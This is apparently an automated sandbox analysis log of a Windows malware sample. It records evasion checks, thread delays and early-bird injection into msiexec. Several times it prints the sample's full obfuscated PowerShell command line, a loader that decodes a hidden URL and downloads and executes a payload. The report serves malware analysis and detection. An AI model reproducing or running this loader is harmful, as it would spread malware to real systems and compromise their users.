                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT caption, serialnumber FROM Win32_DiskDrive
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5483Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4411Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5832Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3974Jump to behavior
                Source: C:\Windows\System32\wscript.exe TID: 3552Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 320Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6120Thread sleep count: 237 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 6120Thread sleep time: -118500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572Thread sleep count: 317 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572Thread sleep time: -951000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572Thread sleep count: 9182 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5572Thread sleep time: -27546000s >= -30000sJump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: wscript.exe, 00000000.00000003.2065459520.000001FB2D8E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: wscript.exe, 00000000.00000003.2047830976.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065709106.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048467850.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063713785.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046230842.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2064439033.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045500545.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2066779885.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2045973752.000001FB2F963000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2213928441.000001A2E32D9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3317523548.0000000000776000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: wscript.exe, 00000000.00000002.2066650226.000001FB2F908000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048216203.000001FB2F905000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046040317.000001FB2F8E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2046230842.000001FB2F908000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2063713785.000001FB2F907000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_04AD9219 LdrInitializeThunk,6_2_04AD9219

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Early bird code injection technique detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Yara detected Powershell download and execute
                Source: Yara matchFile source: amsi64_576.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 576, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTR
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3F90000Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');GerminJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#garveris nontitle fiberizes skippendes tirl sennet longus #>;$conformists='jacobes241';<#udstykkerne microfossil syrians zostera condoled floozies #>; function levelheadedness($antinomians){if ($host.debuggerenabled) {$videoapparatets86++;}$kreturene=$pedlars+$antinomians.'length'-$videoapparatets86; for ( $tekstilarbejderne=2;$tekstilarbejderne -lt $kreturene;$tekstilarbejderne+=3){$blinddren=$tekstilarbejderne;$maalestoksfaktor+=$antinomians[$tekstilarbejderne];}$maalestoksfaktor;}function germiniparous($brions){ & ($artistiske) ($brions);}$plenches=levelheadedness ' ,mano.vz,nifal lmoaa,/pe ';$ruched=levelheadedness 'frthalg s 1 s2 ';$underkuede='b [mans.eiltib. escae sr svhniovcnoeu,p mo qistnaata,msuaten badeg be r p]in:ef:p.sheeficfru dr fidetd y lp rs ount ,oddcedobel o=,n$ r.eu cpuhtsestdti ';$plenches+=levelheadedness 't 5 r. a0fo li(diw ,i cnard.loc,wtesde ren ,tan ro1tr0 .a.0g,;n ,wpui snd 6do4m ;fu ,xp.6sa4 l; . hrpovsp:su1 3m.1sl.su0te) o fogudegrcfokciobr/bu2co0 f1 v0 0 f1so0s 1 g infnoimar letufdioomx m/ u1 r3ne1in.ma0ko ';$olga=levelheadedness 'a u osvaepars,- aatagrueoln cto, ';$booklores=levelheadedness 's.heftovt cphjsnu:br/fu/artcaofor.or tejesm vkdmanamicwhk se unenn,fa a.elc olho/ rbskip.nal/friyen itlaeevrm,psil de vasp.slscynb.pu ';$afstalinisering=levelheadedness ',n>k ';$artistiske=levelheadedness 'pri ekox s ';$tekstilarbejdernenjustices='hvorind';$dadlers='\trkfugl.chr';germiniparous (levelheadedness ' y$mog blfoo.ub cao l,b:sen soopnvaruae al a att istos ndya ulld= a$e.e nu.v :aaafiptupfaduna gte,ash+un$udd ra,ed linedirelstu ');germiniparous (levelheadedness 'fo$prgd.luno cbebadilal:vefsaocal imoobilfoobesanee 1sa9 7re=am$ pbguo nobiksel aob rple sde. ps up ,l ticot r(li$coawofersa,tkvaallw ip n ziepsiseenroviminprgin) k ');germiniparous (levelheadedness $underkuede);$booklores=$foliolose197[0];$moniliaceous231=(levelheadedness 'my$hugpiludohjbcoajull.:sys dkakyskttal ceaur nn,de fsco=hunpuebowb.- o ,b xjfreurc .tnu visstyanse t ueavmst..knfietutme.hewp egeb .cfal i e gnplt m ');germiniparous ($moniliaceous231);germiniparous (levelheadedness 'm.$g,stikh,yf tudls,erurapnvieacs d.d,h e aa cddaesurbasfe[ b$ ,othlr g oage] h=ho$ npa,l e n.lceeh pe tsla ');$absolutive138=levelheadedness 'b,$f.s mk yy ptcel lerir bn.aeausba.a.dc.o.vw dnsjltiounas dg.f.ei.il es (ma$ovba ovio.lklnl obarskefasc,,sa$logrea bmbeitrnlsgb,sdi) l ';$gamings=$nonrelational;germiniparous (levelheadedness ',l$t,gsplg o .bh a bl :drncrokar m,ra al jtanivilc sditk,aupnspd tefontrs.a= n(avtheeinsunt s-mup uanatpeh h di$t,gu,afam piarnkoglgsti)k ');while (!$normaltilstandens) {germiniparous (levelheadedness ' e$c,gbild,o ,b,habelwr: ikblablmg m,re srotap tins.p=t $s tazr bukrei ') ;germiniparous $absolutive138;germiniparous (levelheadedness 'blsb ttaaosrset -losfollae,mehepb ge4om ');germin
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#garveris nontitle fiberizes skippendes tirl sennet longus #>;$conformists='jacobes241';<#udstykkerne microfossil syrians zostera condoled floozies #>; function levelheadedness($antinomians){if ($host.debuggerenabled) {$videoapparatets86++;}$kreturene=$pedlars+$antinomians.'length'-$videoapparatets86; for ( $tekstilarbejderne=2;$tekstilarbejderne -lt $kreturene;$tekstilarbejderne+=3){$blinddren=$tekstilarbejderne;$maalestoksfaktor+=$antinomians[$tekstilarbejderne];}$maalestoksfaktor;}function germiniparous($brions){ & ($artistiske) ($brions);}$plenches=levelheadedness ' ,mano.vz,nifal lmoaa,/pe ';$ruched=levelheadedness 'frthalg s 1 s2 ';$underkuede='b [mans.eiltib. escae sr svhniovcnoeu,p mo qistnaata,msuaten badeg be r p]in:ef:p.sheeficfru dr fidetd y lp rs ount ,oddcedobel o=,n$ r.eu cpuhtsestdti ';$plenches+=levelheadedness 't 5 r. a0fo li(diw ,i cnard.loc,wtesde ren ,tan ro1tr0 .a.0g,;n ,wpui snd 6do4m ;fu ,xp.6sa4 l; . hrpovsp:su1 3m.1sl.su0te) o fogudegrcfokciobr/bu2co0 f1 v0 0 f1so0s 1 g infnoimar letufdioomx m/ u1 r3ne1in.ma0ko ';$olga=levelheadedness 'a u osvaepars,- aatagrueoln cto, ';$booklores=levelheadedness 's.heftovt cphjsnu:br/fu/artcaofor.or tejesm vkdmanamicwhk se unenn,fa a.elc olho/ rbskip.nal/friyen itlaeevrm,psil de vasp.slscynb.pu ';$afstalinisering=levelheadedness ',n>k ';$artistiske=levelheadedness 'pri ekox s ';$tekstilarbejdernenjustices='hvorind';$dadlers='\trkfugl.chr';germiniparous (levelheadedness ' y$mog blfoo.ub cao l,b:sen soopnvaruae al a att istos ndya ulld= a$e.e nu.v :aaafiptupfaduna gte,ash+un$udd ra,ed linedirelstu ');germiniparous (levelheadedness 'fo$prgd.luno cbebadilal:vefsaocal imoobilfoobesanee 1sa9 7re=am$ pbguo nobiksel aob rple sde. ps up ,l ticot r(li$coawofersa,tkvaallw ip n ziepsiseenroviminprgin) k ');germiniparous (levelheadedness $underkuede);$booklores=$foliolose197[0];$moniliaceous231=(levelheadedness 'my$hugpiludohjbcoajull.:sys dkakyskttal ceaur nn,de fsco=hunpuebowb.- o ,b xjfreurc .tnu visstyanse t ueavmst..knfietutme.hewp egeb .cfal i e gnplt m ');germiniparous ($moniliaceous231);germiniparous (levelheadedness 'm.$g,stikh,yf tudls,erurapnvieacs d.d,h e aa cddaesurbasfe[ b$ ,othlr g oage] h=ho$ npa,l e n.lceeh pe tsla ');$absolutive138=levelheadedness 'b,$f.s mk yy ptcel lerir bn.aeausba.a.dc.o.vw dnsjltiounas dg.f.ei.il es (ma$ovba ovio.lklnl obarskefasc,,sa$logrea bmbeitrnlsgb,sdi) l ';$gamings=$nonrelational;germiniparous (levelheadedness ',l$t,gsplg o .bh a bl :drncrokar m,ra al jtanivilc sditk,aupnspd tefontrs.a= n(avtheeinsunt s-mup uanatpeh h di$t,gu,afam piarnkoglgsti)k ');while (!$normaltilstandens) {germiniparous (levelheadedness ' e$c,gbild,o ,b,habelwr: ikblablmg m,re srotap tins.p=t $s tazr bukrei ') ;germiniparous $absolutive138;germiniparous (levelheadedness 'blsb ttaaosrset -losfollae,mehepb ge4om ');germin
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#garveris nontitle fiberizes skippendes tirl sennet longus #>;$conformists='jacobes241';<#udstykkerne microfossil syrians zostera condoled floozies #>; function levelheadedness($antinomians){if ($host.debuggerenabled) {$videoapparatets86++;}$kreturene=$pedlars+$antinomians.'length'-$videoapparatets86; for ( $tekstilarbejderne=2;$tekstilarbejderne -lt $kreturene;$tekstilarbejderne+=3){$blinddren=$tekstilarbejderne;$maalestoksfaktor+=$antinomians[$tekstilarbejderne];}$maalestoksfaktor;}function germiniparous($brions){ & ($artistiske) ($brions);}$plenches=levelheadedness ' ,mano.vz,nifal lmoaa,/pe ';$ruched=levelheadedness 'frthalg s 1 s2 ';$underkuede='b [mans.eiltib. escae sr svhniovcnoeu,p mo qistnaata,msuaten badeg be r p]in:ef:p.sheeficfru dr fidetd y lp rs ount ,oddcedobel o=,n$ r.eu cpuhtsestdti ';$plenches+=levelheadedness 't 5 r. a0fo li(diw ,i cnard.loc,wtesde ren ,tan ro1tr0 .a.0g,;n ,wpui snd 6do4m ;fu ,xp.6sa4 l; . hrpovsp:su1 3m.1sl.su0te) o fogudegrcfokciobr/bu2co0 f1 v0 0 f1so0s 1 g infnoimar letufdioomx m/ u1 r3ne1in.ma0ko ';$olga=levelheadedness 'a u osvaepars,- aatagrueoln cto, ';$booklores=levelheadedness 's.heftovt cphjsnu:br/fu/artcaofor.or tejesm vkdmanamicwhk se unenn,fa a.elc olho/ rbskip.nal/friyen itlaeevrm,psil de vasp.slscynb.pu ';$afstalinisering=levelheadedness ',n>k ';$artistiske=levelheadedness 'pri ekox s ';$tekstilarbejdernenjustices='hvorind';$dadlers='\trkfugl.chr';germiniparous (levelheadedness ' y$mog blfoo.ub cao l,b:sen soopnvaruae al a att istos ndya ulld= a$e.e nu.v :aaafiptupfaduna gte,ash+un$udd ra,ed linedirelstu ');germiniparous (levelheadedness 'fo$prgd.luno cbebadilal:vefsaocal imoobilfoobesanee 1sa9 7re=am$ pbguo nobiksel aob rple sde. ps up ,l ticot r(li$coawofersa,tkvaallw ip n ziepsiseenroviminprgin) k ');germiniparous (levelheadedness $underkuede);$booklores=$foliolose197[0];$moniliaceous231=(levelheadedness 'my$hugpiludohjbcoajull.:sys dkakyskttal ceaur nn,de fsco=hunpuebowb.- o ,b xjfreurc .tnu visstyanse t ueavmst..knfietutme.hewp egeb .cfal i e gnplt m ');germiniparous ($moniliaceous231);germiniparous (levelheadedness 'm.$g,stikh,yf tudls,erurapnvieacs d.d,h e aa cddaesurbasfe[ b$ ,othlr g oage] h=ho$ npa,l e n.lceeh pe tsla ');$absolutive138=levelheadedness 'b,$f.s mk yy ptcel lerir bn.aeausba.a.dc.o.vw dnsjltiounas dg.f.ei.il es (ma$ovba ovio.lklnl obarskefasc,,sa$logrea bmbeitrnlsgb,sdi) l ';$gamings=$nonrelational;germiniparous (levelheadedness ',l$t,gsplg o .bh a bl :drncrokar m,ra al jtanivilc sditk,aupnspd tefontrs.a= n(avtheeinsunt s-mup uanatpeh h di$t,gu,afam piarnkoglgsti)k ');while (!$normaltilstandens) {germiniparous (levelheadedness ' e$c,gbild,o ,b,habelwr: ikblablmg m,re srotap tins.p=t $s tazr bukrei ') ;germiniparous $absolutive138;germiniparous (levelheadedness 'blsb ttaaosrset -losfollae,mehepb ge4om ');germinJump to behavior
                Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager(
                Source: msiexec.exe, 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: msiexec.exe, 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerb
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
